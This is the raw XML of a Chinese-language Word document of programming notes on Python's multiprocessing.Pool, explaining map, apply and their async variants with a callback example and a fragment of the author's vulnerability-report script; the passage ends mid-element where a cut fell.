    <w:p w14:paraId="2AA7FFFC" w14:textId="77777777" w:rsidR="00E340BB" w:rsidRPr="00E340BB" w:rsidRDefault="00E340BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="308325AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="540" w:name="_Toc159779977"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>multiprocessing.Pool</w:t>
      </w:r>
      <w:bookmarkEnd w:id="540"/>
    </w:p>
    <w:p w14:paraId="3248AD72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2932BB38" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="541" w:name="OLE_LINK17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from multiprocessing import Pool, Queue</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="541"/>
    <w:p w14:paraId="1A450DCA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662ECBEE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C526997" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> map, apply, map_async, apply_async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的区别：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A9908E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341B9B76" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="542" w:name="OLE_LINK19"/>
      <w:r>
        <w:t>https://blog.csdn.net/u011331731/article/details/106320199?spm=1001.2101.3001.6661.1&amp;utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-106320199-blog-107920149.pc_relevant_multi_platform_whitelistv3&amp;depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-106320199-blog-107920149.pc_relevant_multi_platform_whitelistv3&amp;utm_relevant_index=1</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="542"/>
    <w:p w14:paraId="2227CBB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="520B7467" wp14:editId="1C7D68FD">
            <wp:extent cx="4712335" cy="1671320"/>
            <wp:effectExtent l="0" t="0" r="12065" b="508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54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4712335" cy="1671320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBF211E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E665C7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要注意：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">map </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> map_async </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入参为迭代器类型，可以批量调用。而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apply_async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只能一个个调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F6B9C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F41814D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>因此，如果你需要在一个单独的进程中运行一个函数，但是希望当前进程在该函数返回之前一直阻塞，请使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Pool.apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>。像一样</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Pool.apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Pool.map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>阻塞直到返回完整的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A2C6D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44576069" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>如果你希望工作进程池异步执行许多功能调用，请使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Pool.apply_async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>。结果的顺序不能保证与调用的顺序相同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Pool.apply_async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671A7E13" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E63883F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还要注意，你可以使用调用许多不同的函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pool.apply_async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（并非所有调用都需要使用同一函数）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6EE7ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C43F7E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相反，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pool.map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将相同的函数应用于许多参数。但是，与不同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pool.apply_async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，返回结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>的顺序与参数的顺序相对应。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC4C128" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6632E316" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pool.apply_async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：调用立即返回而不是等待结果。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsyncResult</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回一个对象。你调用其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法以检索函数调用的结果。该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法将阻塞直到功能完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493EAEBD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pool.apply(func, args, kwargs)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等效于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pool.apply_async(func, args, kwargs).get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C26A25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pool.apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pool.apply_async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法还具有一个回调，则在函数完成时调用该回调。可以使用它来代替</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316ECCFB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02BA943A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>import multiprocessing as mp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD51CC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBE08D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5165E4F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def foo_pool(x):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0DAEDF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    time.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FA845E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    return x*x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B4DE71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C67C27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>result_list = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4795BB9C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def log_result(result):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564B2889" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # This is called whenever foo_pool(i) returns a result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5EF9F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # result_list is modified only by the main process, not the pool workers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A77B28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    result_list.append(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2C5085" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3519F7DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def apply_async_with_callback():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40464894" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    pool = mp.Pool()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635B1C32" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i in range(10):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3955A07A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        pool.apply_async(foo_pool, args = (i, ), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>callback = log_result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA3AE5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    pool.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB21D1D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    pool.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0213A4AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(result_list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A12ABC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FF13662" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C00E0A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    apply_async_with_callback()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E77791" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会产生如下结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE2B8AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07D31413" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[1, 0, 4, 9, 25, 16, 49, 36, 81, 64]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B5C6DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239ADB56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外我的代码中，有使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async_apply().get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DD3DEC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>见漏洞通知一文中代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709D4BBE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6F9D06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:t>多线程运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE7E9B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>pool = Pool()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FCDE1A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    global_vuls_report_dict_thread= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>pool.apply_async</w:t>
      </w:r>
      <w:r>
        <w:t>(Query_from_sca.Query_Upgrade_Vuls_From_SCA, args=(since_time, global_vuls, global_vuls_report ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E16B21" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Golang_upgrade_num_thread= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>pool.apply_async</w:t>
      </w:r>
      <w:r>
